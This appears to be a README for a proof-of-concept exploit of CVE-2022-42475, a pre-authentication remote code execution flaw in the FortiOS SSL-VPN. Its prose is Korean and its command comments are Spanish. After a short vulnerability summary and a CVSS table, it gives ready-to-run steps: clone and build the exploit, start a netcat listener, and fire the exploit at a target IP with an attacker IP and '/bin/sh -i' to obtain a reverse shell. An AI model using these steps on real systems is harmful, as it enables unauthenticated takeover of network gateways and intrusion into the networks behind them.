
개념 증명(PoC)으로, 특정 버전의 FortiOS에서 SSL-VPN 서비스에 영향을 주는 치명적인 힙 기반 버퍼 오버플로 취약점인 CVE-2022-42475에 대한 연구 및 통제된 실험실 검증용입니다.
Fortinet SSL VPN 사전 인증 원격 코드 실행
CVE-2022-42475는 FortiOS SSL VPN 서비스의 힙 기반 버퍼 오버플로 취약점으로, 인증되지 않은 공격자가 /remote/error 엔드포인트로 전송되는 특수하게 제작된 HTTP 요청을 통해 임의 코드를 원격으로 실행(RCE)할 수 있게 합니다.
이 취약점은 공식 패치가 발표되기 전에 실제 환경에서 활발히 악용되었습니다(0-day).
다음 스크린샷은 승인된 실험실 환경에서 PoC를 실행한 모습을 보여줍니다:
출력에는 PoC 실행과 테스트에 사용된 FortiOS 인스턴스와의 상호 작용이 표시됩니다.

| 필드 | 값 |
|---|
| CVE ID | CVE-2022-42475 |
| CVSS 3.1 | 9.3 (치명적) |
| Vector | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| CWE | CWE-122 |
| 발견일 | 2022년 12월 |
| 공식 패치 | FortiOS 7.2.3, 7.0.9, 6.4.11, 6.2.12, 6.0.16 |
# Clonar o descargar el código fuente
git clone https://github.com/uLl0a/cve-2022-42475-poc
cd cve-2022-42475-poc
# Compilar
go build -o exploit exploit.go
# O ejecutar directamente
go run exploit.go <target> <port> <reverse_ip> <params>
./exploit <target_host> <target_port> <reverse_ip> <param1> [param2...]
# En el atacante, iniciar listener
nc -lvnp 80
# Ejecutar el exploit
./exploit 192.168.1.100 443 10.0.0.5 /bin/sh -i